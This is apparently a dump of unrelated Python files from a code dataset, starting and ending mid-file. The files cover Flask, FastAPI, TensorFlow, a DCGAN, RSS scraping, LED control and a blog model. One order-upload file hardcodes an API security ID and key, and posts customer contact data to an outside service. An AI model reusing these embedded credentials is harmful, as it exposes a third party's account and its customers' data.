username=username, password=password,\n\t\t\thost=host, database=database, params=params)\n\t\treturn db_uri\n\n\tdef save_log(self, message):\n\t\t\"\"\" Saving logs in AWS \"\"\"\n\t\turl = self.get_url(\"logs\")\n\t\tlog_description = \"Saving log in {url}: {message}\"\n\t\tprint(log_description.format(url=url, message=message))\n\n\tdef werkzeug_errors(self):\n\t\t\"\"\" Custom errors for flask_restful \"\"\"\n\n\t\terrors = {\n\t\t\t'NotFound': self.build_error_response(404, return_code=False),\n\t\t\t'Forbidden': self.build_error_response(403, return_code=False),\n\t\t\t'MethodNotAllowed': self.build_error_response(405, return_code=False),\n\t\t\t'InternalServerError': self.build_error_response(500, return_code=False),\n\t\t\t'Unauthorized': self.build_error_response(401, return_code=False),\n\t\t\t'BadRequest': self.build_error_response(400, return_code=False),\n\t\t\t'RequestTimeout': self.build_error_response(408, return_code=False),\n\t\t\t'NotAcceptable': self.build_error_response(406, return_code=False),\n\t\t\t'Conflict': self.build_error_response(409, return_code=False),\n\t\t\t'Gone': self.build_error_response(410, return_code=False),\n\t\t\t'RequestEntityTooLarge': self.build_error_response(413, return_code=False),\n\t\t\t'RequestURITooLarge': self.build_error_response(414, return_code=False),\n\t\t\t'ExpectationFailed': self.build_error_response(417, return_code=False),\n\t\t\t'TooManyRequests': self.build_error_response(429, return_code=False),\n\t\t\t'ServiceUnavailable': self.build_error_response(503, return_code=False),\n\t\t}\n\t\treturn errors\n","sub_path":"code_structure/config/clv_base.py","file_name":"clv_base.py","file_ext":"py","file_size_in_byte":5958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"339171379","text":"import pandas\nimport matplotlib\nmatplotlib.use('Agg')\nimport pylab as plt\nimport numpy as np\nimport sys\n\n\nM = 29\ndef read_data(inF):\n df = pandas.read_table(inF, header=None)\n term = df.ix[0:M, 0][::-1]\n sig = df.ix[0:M, 6][::-1]\n pvalue = df.ix[0:M, 3][::-1]\n return(term, sig, pvalue)\n\ndef get_sig_gene_num(inF):\n df = pandas.read_table(inF, header = 0)\n n = df.shape[0]\n return(n)\n\ndef plot(inF, ouFpre):\n [term, sig, pvalue] = read_data(inF)\n sig_gene_num = get_sig_gene_num(inF.split('-tf-RD')[0] + '.txt')\n\n N = len(term)\n Labels = term\n L2 = sig\n\n xticks = range(1, N + 1)\n xticksTotal = range(0, N + 2)\n fig = plt.figure()\n ax = fig.add_axes([0.15,0.1,0.7,0.8])\n ax.set_xlim(int(max(list(sig))*1.1), 0)\n #ax.set_xticks(range(int(max(sig)) + 1, -1, -1))\n bh2 = ax.barh(xticks, L2, align = 'center', fc='blue', alpha = 0.4, ec='blue')\n ax.set_ylim(0, N + 1)\n ax.set_yticks(xticksTotal)\n ax.set_yticklabels([''] + list(pvalue) + [''], fontsize=10)\n ax.set_ylabel('p value')\n #ax.legend([bh1[1], bh2[1]], ['observed - expected','expected'], ncol = 2, prop={'size':10}, loc = 'upper right', bbox_to_anchor=(1.01, 1.08))\n ax.set_xlabel('Number of binding genes')\n ax.set_title(ouFpre + ', %s significant genes'%sig_gene_num, fontsize=12)\n\n ax2 = ax.twinx()\n ax2.set_yticks(ax.get_yticks())\n ax2.set_yticklabels([''] + list(Labels) + [''], fontsize=10)\n plt.savefig(inF.split('.txt')[0] + '-top%s.pdf'%(M+1))\n plt.grid()\n\n\n \nplot('MHCII_HighLow_Tspan8_PositiveNegative_sig-tf-RD', 'MHCII HighLow, Tspan8 Positive vs Negative')\nplot('MHCII_high_Tspan8_PositiveNegative_sig-tf-RD', 'MHCII High, Tspan8 Positive vs 
Negative')\nplot('MHCII_low_Tspan8_PositiveNegative_sig-tf-RD', 'MHCII Low, Tspan8 Positive vs Negative')\nplot('Tspan8_negative_MHCII_HighLow_sig-tf-RD', 'Tspan8 Negative, MHCII High vs Low')\nplot('Tspan8_positive_MHCII_HighLow_sig-tf-RD', 'Tspan8 Positive, MHCII High vs Low')\nplot('Tspan8_PositiveNegative_MHCII_HighLow_sig-tf-RD', 'Tspan8 PositiveNegative, MHCII High vs Low')\n","sub_path":"mTECs/14-RNASeq/03-DESeq/Gprofiler/TFplot/02-tf-plot.py","file_name":"02-tf-plot.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"521933393","text":"\"\"\"\nDefines FCGI server\n\"\"\"\n\n# HeadURL\t\t$HeadURL: file:///Z:/backup/svn/webstuff/tags/release20061229_v_1_0_0/webstuff/server/fastcgi_if.py $\n# Author:\t\t$Author: atis $\n# File version:\t$Revision: 59 $\n# Last changes:\t$Date: 2006-07-17 16:44:00 +0300 (Pr, 17 Jūl 2006) $\n\n\nfrom common_if import *\nimport flup.server.fcgi as fcgi\n\n# user main function\nuser_func = None\n\n# server instance\nserverInstance = None\n\ndef _main(environ, start_response):\n\t\"\"\"Wraps user function to work with flup FastCGI.\"\"\"\n\n\tstorage.add_thread()\n\n\ttry:\n\t\t# setup thread storage\n\t\tstorage[\"headers\"] = []\n\t\tstorage[\"response\"] = (200, \"OK\")\n\t\tstorage[\"content\"] = \"\"\n\n\t\t# get and parse query string\n\t\tquery_string = environ.get(\"QUERY_STRING\", \"\")\n\t\tstorage[\"getvars\"] = cgi.parse_qs(query_string, True)\n\n\t\t# store POST\n\t\tinput_file = environ[\"wsgi.input\"]\n\t\tenviron[\"QUERY_STRING\"] = \"\"\n\t\tstorage[\"postvars\"] = cgi.parse(input_file, environ, 1)\n\n\t\t# store cookies\n\t\tcookie_obj = Cookie.SimpleCookie()\n\t\tcookie_obj.load(environ.get(\"HTTP_COOKIE\", \"\"))\n\t\tcookies = {}\n\t\tfor key, morsel in cookie_obj.iteritems():\n\t\t\tcookies[key] = morsel.value\n\t\tstorage[\"cookies\"] = cookies\n\n\t\t# store environment\n\t\tenviron[\"QUERY_STRING\"] = query_string\n\t\tstorage[\"env\"] = environ\n\n\t\t# execute user function\n\t\tuser_func()\n\n\t\t# output response and headers\n\t\tcode, descr = storage[\"response\"]\n\t\theader(\"Content-Length\", str(len(storage[\"content\"])))\n\t\tstart_response(str(code) + ' ' + descr, storage[\"headers\"])\n\n\t\t# get content\n\t\tcontent = storage[\"content\"]\n\tfinally:\n\t\t# clean thread storage\n\t\tstorage.remove_thread()\n\n\treturn [content]\n\n#\n# Below are functions callable by user\n#\n\ndef init(_user_func, ip = \"127.0.0.1\", port = 9777):\n\t\"\"\"Initialize web module.\"\"\"\n\n\tglobal user_func\n\n\tuser_func = _user_func\n\taddr = (ip, port)\n\tglobal serverInstance\n\tserverInstance = fcgi.WSGIServer(_main, bindAddress = addr)\n\t\ndef run():\n\t\"\"\"Listen to requests\"\"\"\n\treturn serverInstance.run()\n","sub_path":"bsdradius/webstuff/server/fastcgi_if.py","file_name":"fastcgi_if.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"329871523","text":"from fastapi import APIRouter\nfrom fastapi import HTTPException\n\nfrom app.config import memory_cache\nfrom app.domain.entity import Entity\nfrom app.domain.source import Source\nfrom app.event_server.utils.memory_cache import MemoryCache, CacheItem\n\n\nrouter = APIRouter()\n\n\nclass SourceCacher:\n\n def __init__(self):\n self._cache = MemoryCache()\n\n async def validate_source(self, source_id) -> Source:\n entity = Entity(id=source_id)\n\n source = await 
self.get(entity)  # type: Source\n        if source is None:\n            raise HTTPException(detail=\"Access denied. Invalid source.\", status_code=401)\n\n        if not source.enabled:\n            raise HTTPException(detail=\"Access denied. Source disabled.\", status_code=404)\n\n        return source\n\n    async def get(self, source: Entity):\n        # Cache entries are keyed by source id; a constant key would make\n        # every source id share a single cached Source.\n        key = source.id\n        if key in self._cache:\n            return self._cache[key].data\n        else:\n            # Expired\n            source = await source.storage(\"source\").load(Source)  # type: Source\n            if source is not None:\n                self._cache[key] = CacheItem(data=source, ttl=memory_cache.source_ttl)\n                return source\n            return None\n\n\nsource_cache = SourceCacher()\n","sub_path":"app/event_server/service/source_cacher.py","file_name":"source_cacher.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"581575913","text":"import tensorflow as tf\r\nimport numpy as np\r\n\r\ndef fancy_calculate_number_of_ones(number):\r\n    \"\"\"Only use this once it is supported\"\"\"\r\n\r\n    # https://stackoverflow.com/questions/109023/how-to-count-the-number-of-set-bits-in-a-32-bit-integer\r\n    #i = i - ((i >> 1) & 0x55555555);\r\n    #i = (i & 0x33333333) + ((i >> 2) & 0x33333333);\r\n    #return (((i + (i >> 4)) & 0x0F0F0F0F) * 0x01010101) >> 24;\r\n\r\n    # (i + (i >> 4))\r\n\r\n    fivers = tf.constant(0x55555555, dtype=tf.int32)\r\n    threes = tf.constant(0x33333333, dtype=tf.int32)\r\n    ffs = tf.constant(0x0F0F0F0F, dtype=tf.int32)\r\n    ones = tf.constant(0x01010101, dtype=tf.int32)\r\n    threes_64 = tf.constant(0o033333333333, dtype=tf.int64)\r\n    full_ones = tf.constant(0o011111111111, dtype=tf.int64)\r\n    sevens = tf.constant(0o030707070707, dtype=tf.int64)\r\n\r\n    #i = i - ((i >> 1) & 0x55555555);\r\n    i = number - tf.bitwise.bitwise_and(tf.bitwise.right_shift(number, 1), fivers)\r\n\r\n    #i = (i & 0x33333333) + ((i >> 2) & 0x33333333);\r\n    i = tf.bitwise.bitwise_and(i, threes) + \\\r\n        tf.bitwise.bitwise_and(tf.bitwise.right_shift(i, 2), threes)\r\n\r\n    # (((i + (i >> 4)) & 0x0F0F0F0F) * 0x01010101)\r\n    i = tf.bitwise.bitwise_and(i + tf.bitwise.right_shift(i, 4), ffs) * ones\r\n\r\n    # i >> 24\r\n    i = tf.bitwise.right_shift(i, 24)\r\n\r\n\r\n    number = tf.cast(number, tf.int64)\r\n    bitwise1 = tf.bitwise.bitwise_and(tf.bitwise.right_shift(number, 1), threes_64)\r\n    bitwise2 = tf.bitwise.bitwise_and(tf.bitwise.right_shift(number, 2), full_ones)\r\n    uCount = number - bitwise1 - bitwise2\r\n\r\n    bitwise3 = tf.bitwise.bitwise_and(uCount + tf.bitwise.right_shift(uCount, 3), sevens)\r\n    result = tf.mod(bitwise3, 63)\r\n    #result = tf.Print(result, [result, i])\r\n    i = tf.Print(i, [number, i, result])\r\n    #return result\r\n    return i\r\n\r\n\r\n\r\ndef test1():\r\n\r\n    session = tf.Session(config=tf.ConfigProto(\r\n        device_count={'GPU': 0}\r\n    ))\r\n\r\n    input = tf.placeholder(tf.int32, shape=[1])\r\n\r\n    result = fancy_calculate_number_of_ones(input)\r\n    for i in range(17):\r\n        array = np.array([i])\r\n        session.run(result, feed_dict={input: array})\r\n\r\n\r\n\r\ndef test2():\r\n\r\n    session = tf.Session(config=tf.ConfigProto(\r\n        device_count={'GPU': 0}\r\n    ))\r\n\r\n    input = tf.placeholder(tf.int32, shape=[1])\r\n\r\n    result = tf.bitwise.right_shift(input, 2)\r\n    divide = input // 4\r\n\r\n    result = tf.Print(result, [input, result, divide])\r\n    for i in range(17):\r\n        array = np.array([i])\r\n        session.run(result, feed_dict={input: array})\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    #test1()\r\n    
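    # test2 prints tf.bitwise.right_shift(x, 2) next to x // 4 for comparison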
test2()\r\n","sub_path":"bot_code/tests/bit_tests.py","file_name":"bit_tests.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"117520813","text":"from factors.SimilarityFactor import calculateSimilarity\nfrom factors.ExpertFactor import calculateExpert\nfrom factors.FriendlyFactor import calculateFriendly\nfrom factors.LeaderFactor import calculateLeadership\nfrom factors.FinalFactor import generateFinalFactor\n\ndef getInfluenceFactors(social_resume):\n data = { \"users\": social_resume }\n\n # similarityMatrix = calculateSimilarityMatrix(data)\n similarities = calculateSimilarity(data)\n print(\"similarities: {}\" .format(similarities))\n\n # Expert Factor\n expert = calculateExpert(data)\n print(\"Expert: {}\" .format(expert))\n\n # Friendly Factor\n friendly = calculateFriendly(data)\n \n\n print(\"Friendly:{}\" .format(friendly))\n\n #leadership Factor\n leadership = calculateLeadership(data)\n print (\"Leadership:{}\" .format(leadership))\n\n\n \n final = generateFinalFactor(similarities, expert, friendly, leadership)\n print (\"Final:{}\" .format(final))\n\n influence_factors = {\n \"similarities\": similarities,\n \"expert\": expert,\n \"friendly\": friendly,\n \"leadership\": leadership,\n \"final\": final\n }\n\n return influence_factors\n","sub_path":"src/factors/Influence.py","file_name":"Influence.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"111780320","text":"\nclass Tree:\n root = None\n\n def addNode(self, n):\n if (self.root is None):\n self.root = n\n else:\n self.root.addNode(n)\n\n def addValue(self,index,val):\n n = Node(index,val)\n self.addNode(n)\n\n\n def traverse(self):\n l = []\n self.root.visit(l)\n return(l)\n\n def search(self, i):\n return(self.root.search(i))\n\nclass Node:\n index = None\n value = None\n left = None\n right = None\n\n def __init__(self, i, val):\n self.index = i\n self.value = val\n\n def addNode(self, n):\n if(n.index < self.index):\n if(self.left is None):\n self.left = n\n else:\n self.left.addNode(n)\n elif(n.index > self.index):\n if(self.right is None):\n self.right = n\n else:\n self.right.addNode(n)\n\n def visit(self, l):\n if(self.right is not None ):\n self.right.visit(l)\n l.append(self.value)\n if(self.left is not None):\n self.left.visit(l)\n\n def search(self,i):\n if(self.index == i):\n return(self.value)\n elif(i > self.index) and (self.right is not None ):\n return(self.right.search(i))\n elif(i < self.index) and (self.left is not None ):\n return(self.left.search(i))\n return None\n\n\"\"\"\nCodeExample:\n# initializing new tree\ntree = Tree()\n# Adding new Node\nn = Node(5, 5)\ntree.addNode(n)\n# Adding value for cleaner code\ntree.addValue(7,7)\n\n# Getting sorted list from binary tree. high to low\nlist = tree.traverse()\n[7,5]\n\n# Search the binary tree. 
Nonetype if nothing exists\nsearch = tree.search(5)\n5\n\n\"\"\"\n","sub_path":"binarytree.py","file_name":"binarytree.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"590780996","text":"\"\"\"\nURLs file for OCR app.\n\"\"\"\nfrom django.conf.urls import url\nfrom rest_framework import routers\n\n# from ocr import views\nfrom ocr.views import ocr_datasource_config_list, ProjectView, \\\n get_dashboard_metrics, get_recent_activity\nfrom ocr.views import OCRImageView, OCRImagesetView, OCRUserView, \\\n OCRUserProfileView, GroupListView\n\n# -------------------------------------------------------------------------------\n# pylint: disable=too-many-ancestors\n# pylint: disable=no-member\n# pylint: disable=too-many-return-statements\n# pylint: disable=too-many-locals\n# pylint: disable=too-many-branches\n# pylint: disable=invalid-name\n# pylint: disable=line-too-long\n# -------------------------------------------------------------------------------\n\nrouter = routers.DefaultRouter()\nrouter.register(\n 'ocrimage',\n OCRImageView,\n base_name='ocrimages'\n)\n\nrouter.register(\n 'ocrimageset',\n OCRImagesetView,\n base_name='ocrimagesets'\n)\n\nrouter.register(\n 'user',\n OCRUserView,\n base_name='user'\n)\n\nrouter.register(\n 'userprofile',\n OCRUserProfileView,\n base_name='userprofile'\n)\nrouter.register(\n 'project',\n ProjectView,\n base_name='projects'\n)\n\nurlpatterns = [\n url(r'^datasource/ocr_datasource_config_list$', ocr_datasource_config_list, name=\"ocr_datasource_config_list\"),\n url(r'^groups/',GroupListView.as_view(), name=\"groups\"),\n url(r'^get_dashboard_metrics', get_dashboard_metrics, name=\"get_dashboard_metrics\"),\n url(r'^get_recent_activity', get_recent_activity, name=\"get_recent_activity\"),\n\n]\nurlpatterns += router.urls\n","sub_path":"ocr/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"259012284","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 17 11:41:59 2020\n\n@author: chenghaili\n\"\"\"\n\nimport os\nos.chdir(os.path.abspath(os.path.join(os.getcwd(), \"..\")))\n\nimport args\nimport time\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras import layers\n\n# Init args\nn = args.n\nsize = args.size\ndrug = args.drug\ndrug_quantity = args.drug_quantity\nporosity = args.porosity\nblobiness = args.blobiness\npath = args.path\n\ndata = np.load(path+'data.npy')\ndata = tf.convert_to_tensor(data)\ndata = tf.expand_dims(data, -1)\n\nnoise_dim = 100\nBATCH_SIZE = 10\nBUFFER_SIZE = 50\nEPOCHS = 200\n\ntrain_dataset = tf.data.Dataset.from_tensor_slices(data).shuffle(BUFFER_SIZE).batch(BATCH_SIZE)\n\ndef make_generator_model():\n \n model = tf.keras.Sequential()\n \n model.add(layers.Dense( 16 * 16 * 64, use_bias=False, input_shape=(noise_dim,)))\n model.add(layers.BatchNormalization())\n model.add(layers.LeakyReLU())\n\n model.add(layers.Reshape((16, 16, 64)))\n\n model.add(layers.Conv2DTranspose(32, (5, 5), strides=(2, 2), padding='same', use_bias=False))\n model.add(layers.BatchNormalization())\n model.add(layers.LeakyReLU())\n\n model.add(layers.Conv2DTranspose(1, (10, 10), strides=(4, 4), padding='same', use_bias=False, activation='sigmoid'))\n\n return model\n\ndef make_discriminator_model():\n \n model = tf.keras.Sequential()\n \n 
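    # Downsample 128x128 -> 32x32 -> 16x16 with strided convolutions,
    # then flatten to a single real/fake logit.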
model.add(layers.Conv2D(32, (10, 10), strides=(4, 4), padding='same', input_shape=[128, 128, 1]))\n model.add(layers.LeakyReLU())\n model.add(layers.Dropout(0.3))\n\n model.add(layers.Conv2D(64, (5, 5), strides=(2, 2), padding='same'))\n model.add(layers.LeakyReLU())\n model.add(layers.Dropout(0.3))\n \n model.add(layers.Flatten())\n model.add(layers.Dense(1))\n\n return model\n\ngenerator = make_generator_model()\ndiscriminator = make_discriminator_model()\n\ncross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\ndef discriminator_loss(real_output, fake_output):\n real_loss = cross_entropy(tf.ones_like(real_output), real_output)\n fake_loss = cross_entropy(tf.zeros_like(fake_output), fake_output)\n total_loss = real_loss + fake_loss\n return total_loss\n\ndef generator_loss(fake_output):\n return cross_entropy(tf.ones_like(fake_output), fake_output)\n\n@tf.function\ndef train_step(images):\n noise = tf.random.normal([BATCH_SIZE, noise_dim])\n\n with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n generated_images = generator(noise, training=True)\n\n real_output = discriminator(images, training=True)\n fake_output = discriminator(generated_images, training=True)\n\n gen_loss = generator_loss(fake_output)\n disc_loss = discriminator_loss(real_output, fake_output)\n\n gradients_of_generator = gen_tape.gradient(gen_loss, generator.trainable_variables)\n gradients_of_discriminator = disc_tape.gradient(disc_loss, discriminator.trainable_variables)\n\n generator_optimizer.apply_gradients(zip(gradients_of_generator, generator.trainable_variables))\n discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator, discriminator.trainable_variables))\n \n return tf.reduce_sum(gen_loss), tf.reduce_sum(disc_loss)\n \ndef train(dataset, epochs):\n \n for epoch in range(epochs):\n start = time.time()\n g = 0\n d = 0\n for image_batch in dataset:\n gen_l, disc_l = train_step(image_batch)\n g += gen_l\n d += disc_l\n print ('epoch {} use {:.5f} sec, G_l {:.5f}, D_l {:.5f}'.format(epoch + 1, time.time()-start, g, d))\n \ngenerator_optimizer = tf.keras.optimizers.Adam(1e-3)\ndiscriminator_optimizer = tf.keras.optimizers.Adam(2e-5)\n \ntrain(train_dataset, EPOCHS)\n\nnoise = tf.random.normal([1, noise_dim])\ngenerated_image = generator(noise, training=False)\n\nplt.imshow(generated_image[0, :, :, 0])\ndecision = discriminator(generated_image)\nprint (decision)","sub_path":"2D version/Neural network/DCGAN.py","file_name":"DCGAN.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"62952298","text":"import requests\nimport json\n\nfrom janio_order import models as order_models\n\n\ndef submitToSatsaco(agent, order_ids):\n orders = order_models.Order.objects.filter(agent_id=agent, order_id__in=order_ids)\n\n orders_data = []\n\n for order in orders:\n order_data = {}\n\n order_data['packing_id'] = order.tracking_no\n order_data['consignee_name'] = order.consignee_name\n order_data['consignee_number'] = order.consignee_number\n order_data['consignee_address'] = order.consignee_address\n order_data['consignee_postal'] = order.consignee_postal\n order_data['consignee_country'] = order.consignee_country\n order_data['consignee_city'] = order.consignee_city\n order_data['consignee_state'] = order.consignee_state\n order_data['consignee_number'] = order.consignee_number\n order_data['consignee_email'] = order.consignee_email\n order_data['order_length'] = 
float(order.order_length)\n order_data['order_width'] = float(order.order_width)\n order_data['order_height'] = float(order.order_height)\n order_data['order_weight'] = float(order.order_weight)\n order_data['pickup_address'] = order.pickup_address\n order_data['items'] = []\n\n items = order_models.Item.objects.filter(order_id=order)\n num_of_items = 0\n for item in items:\n item_data = {}\n\n item_data['item_product_id'] = item.item_product_id\n item_data['item_sku'] = item.item_sku\n item_data['item_desc'] = item.item_desc\n item_data['item_quantity'] = item.item_quantity\n item_data['item_category'] = item.item_category\n item_data['item_price_value'] = float(item.item_price_value)\n item_data['item_price_currency'] = item.item_price_currency\n\n order_data['items'].append(item_data)\n\n orders_data.append(order_data)\n\n r = requests.post('http://waterman.com.sg/satsaco/api/upload_order', data = {\n 'security_id': '00lnnlmv86',\n 'security_key': 'px0418yajz7rjm82ikjw37kwhkoy92hj',\n 'orders': json.dumps(orders_data),\n })\n\n # print(r.status_code)\n # print(r.text)\n","sub_path":"janio_order/externalServiceUtils.py","file_name":"externalServiceUtils.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"366812742","text":"\n# python standard library\nimport os\nimport zipfile\n\nimport feedparser\n# 3rd-party, pip installed libraries\nimport pandas as pd\n\npd.set_option(\"display.float_format\", lambda x: \"%.5f\" % x) # pandas\npd.set_option(\"display.max_columns\", 100)\npd.set_option(\"display.max_rows\", 100)\npd.set_option(\"display.width\", 600)\n\npd.set_option('expand_frame_repr', True)\npd.set_option('max_rows', 50)\npd.set_option('display.max_rows', 50)\n\nrss_url = r'http://www.globenewswire.com/AtomFeed/orgclass/1/feedTitle/GlobeNewswire%20-%20News%20about%20Public%20Companiesc'\nearnings_url = r'http://www.globenewswire.com/AtomFeed/subjectcode/13-Earnings%20Releases%20And%20Operating%20Results/feedTitle/GlobeNewswire%20-%20Earnings%20Releases%20And%20Operating%20Results'\ndiv_rss = r'http://www.globenewswire.com/AtomFeed/subjectcode/12-Dividend%20Reports%20And%20Estimates/feedTitle/GlobeNewswire%20-%20Dividend%20Reports%20And%20Estimates'\nmna_Rss = r'http://www.globenewswire.com/AtomFeed/subjectcode/27-Mergers%20And%20Acquisitions/feedTitle/GlobeNewswire%20-%20Mergers%20And%20Acquisitions'\nprnewswire_rss = r'https://www.prnewswire.com/rss/all-news-releases-from-PR-newswire-news.rss'\nrss_feeds = r'D:\\PROJECTS\\presentations\\rss_feeds.csv'\npr_rss1 = r'https://www.prnewswire.com/rss/financial-services-latest-news.rss'\nnas_rss = r'http://ir.nasdaq.com/rss/news-releases.xml?items=15'\nprweb_rss = r'http://www.prweb.com/rss2/daily.xml'\n\ndef flatten_json(dictionary):\n \"\"\"Flatten a nested json file\"\"\"\n from itertools import chain, starmap\n\n def unpack(parent_key, parent_value):\n \"\"\"Unpack one level of nesting in json file\"\"\"\n # Unpack one level only!!!\n\n if isinstance(parent_value, dict):\n for key, value in parent_value.items():\n temp1 = parent_key + '_' + key\n yield temp1, value\n elif isinstance(parent_value, list):\n i = 0\n for value in parent_value:\n temp2 = parent_key + '_' + str(i)\n i += 1\n yield temp2, value\n else:\n yield parent_key, parent_value\n # Keep iterating until the termination condition is satisfied\n\n while True:\n # Keep unpacking the json file until all values are atomic elements (not dictionary or list)\n dictionary = 
dict(chain.from_iterable(starmap(unpack, dictionary.items())))\n # Terminate condition: not any value in the json file is dictionary or list\n if not any(isinstance(value, dict) for value in dictionary.values()) and \\\n not any(isinstance(value, list) for value in dictionary.values()):\n break\n\n return dictionary\n\nfrom datetime import datetime\ndf = pd.read_csv(rss_feeds)\n\ndata_dir = os.path.join(os.getcwd(), \"data\\\\rss\")\n\nimport pandas as pd\n\nkeep = ('title', 'link', 'published', 'published_parsed', 'summary', 'id')\n\ndf_filtered = df[df['CATEGORY'].isin(['business', 'politics', 'science', 'tech','general'])]\ndf_filtered_us = df_filtered[df_filtered['COUNTRY_CODE'].isin(['US'])]\n\n_entries = []\nall_entries = []\n\nfrom urllib import parse\nimport tldextract\n\nfor i, feed in df_filtered_us.iterrows():\n print(feed)\n url = \"https://\" + feed.URL\n parsed_url = parse.urlparse(url)\n print(parsed_url)\n dom = tldextract.extract(url)\n # filename = f'{dom.domain}.csv'\n folderpath = os.path.join(f'.\\\\data\\\\rss\\\\{dom.domain}')\n\n if not os.path.exists(folderpath):\n os.mkdir(folderpath)\n\n filename = f\"{datetime.now().strftime('%Y-%m-%dT%H-%M-%S')}.csv\"\n\n filepath = os.path.join(folderpath, filename)\n\n print(filepath)\n\n _entries = []\n\n _feed = feedparser.parse(url)\n\n if len(_feed.entries) == 0:\n print(\"FOUND 0 Entries\\n\\n\")\n url = \"http://\" + feed.URL\n _feed = feedparser.parse(url)\n\n for entry in _feed.entries:\n\n final_dict = flatten_json(entry)\n _entries.append(final_dict)\n\n _title = entry.get(\"title\", \"No Title\")\n _published = entry.get('updated', None)\n\n if not _published:\n _published = entry.get('published', None)\n\n headline_dict = {\"title\": _title, \"published\": _published, \"source\": dom.domain }\n\n all_entries.append(headline_dict)\n\n df_entries = pd.DataFrame(_entries)\n\n df_entries['datasource'] = dom.domain\n df_entries.to_csv(filepath)\n\ndf = pd.DataFrame(all_entries)\ndf = df.sort_values('published', ascending=False)\ndf.reset_index(inplace=True,drop=True)\ndf.to_csv(os.path.join(f\"headlines_{datetime.now().strftime('%Y-%m-%d %H-%M-%S')}.csv\"))\n","sub_path":"06-flask/flask-rss/other/rss_feed.py","file_name":"rss_feed.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"393322628","text":"import os\n\ndirname = \"/data/burak/deeplearning/\"\n#filenames = glob.glob(dirname + \"Uni-Processed/**/*.html\", recursive=True)\noutfilename = dirname + \"merge2.txt\"\n\nwith open(outfilename, 'w') as outfile:\n\tfor subdir, dirs, files in os.walk(dirname + \"Uni-Processed/\"):\n\t\tfor fname in files:\n\t\t\tif fname.endswith('.html'):\n\t\t\t\twith open(os.path.join(subdir, fname), 'r') as readfile:\n\t\t\t\t\toutfile.write(readfile.read().replace('\\n', ' ').replace('\\t', ' ') + \"\\n\")\n","sub_path":"onefileperline.py","file_name":"onefileperline.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"290637097","text":"import time\nimport subprocess \nthink = \"tpacpi::thinklight\"\npower = \"tpacpi::power\"\nvantage = \"tpacpi::thinkvantage\"\nstandby = \"tpacpi::standby\"\n\nmmc0 = \"mmc0::\"\nphy0 = \"phy0-led\"\n\n\ntarget = open(\"/dev/null\",'r')\nfname = \"/dev/null\"\n\n\ndef load(led):\n\tglobal fname\n\tglobal target\n\ttarget = open(\"/sys/class/leds/\" + str(led) + \"/brightness\",'w')\n\tfname = 
\"/sys/class/leds/\" + str(led) + \"/brightness\"\ndef setled(state):\n\tglobal target\n\ttarget.write(state)\n\ttarget.flush()\n\ndef getled():\n\tt = open(fname,'r')\n\treturn t.next()\n\ndef setbacklight(brightness):\n\tsubprocess.call(\"echo \" + str(brightness) + \" > /sys/class/backlight/acpi_video0/brightness\", shell = True)\n","sub_path":"hardwarelib.py","file_name":"hardwarelib.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"29582417","text":"import time\nfrom models import Mongodb\nfrom utils import log\nfrom models.user import User\nimport io\nimport re\nimport os\nimport config\n\n\ndef filtered_blog(blog, **kwargs):\n    valid_attributes = [\n        'id',\n        'title',\n        'content',\n        # 'created_time',\n        'ct',\n        'nextId',\n        'nextTitle',\n        'prevId',\n        'prevTitle',\n    ]\n    form = {}\n    for key in valid_attributes:\n        if hasattr(blog, key):\n            value = getattr(blog, key)\n            form[key] = value\n    if (kwargs.get('abstract', False)):\n        form['content'] = form['content'][: 300]\n    return form\n\n\ndef filtered_blogs(blogs, **kwargs):\n    blog_list = []\n    for blog in blogs:\n        blog_list.append(filtered_blog(blog, **kwargs))\n    return blog_list\n\n\nclass Blog(Mongodb):\n    __fields__ = Mongodb.__fields__ + [\n        ('id', str, ''),\n        ('title', str, ''),\n        ('excerpt', str, ''),\n        # ('content', str, ''),\n        ('body', str, ''),\n        ('next_title', str, ''),\n        ('previous_title', str, ''),\n        ('user_id', int, -1),\n        ('views', int, 0),\n        ('cover_name', str, ''),\n        # ('author', str, ''),\n        ('next_id', str, ''),\n        ('previous_id', str, ''),\n    ]\n\n    @classmethod\n    def new(cls, form, **kwargs):\n        blog = super().new(form, **kwargs)\n        log('new blog', blog)\n        u = User.current_user()\n        setattr(blog, 'user_id', u._id)\n        blog.id = str(blog._id)\n        blog.save()\n        Blog.update_adjacency()\n        # log('after add user info, blog', blog)\n        return blog\n\n    @classmethod\n    def 